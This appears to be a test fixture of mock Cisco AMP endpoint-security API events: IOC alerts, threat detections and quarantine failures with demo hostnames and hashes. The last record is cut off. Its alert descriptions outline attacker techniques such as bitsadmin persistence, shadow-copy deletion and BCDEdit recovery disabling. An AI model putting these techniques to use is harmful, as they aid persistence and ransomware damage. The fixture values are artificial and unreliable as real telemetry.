+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":423000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9C0A7193","detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"l3ghakfl.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\l3ghakfl\\l3ghakfl.dll","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"},"parent":{"process_id":6748,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":706000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587021790740669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1ceeffdd10ece58a1b0f298bf4bd2ca65e1ef5cd50248f89f89870e21c7e5e3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 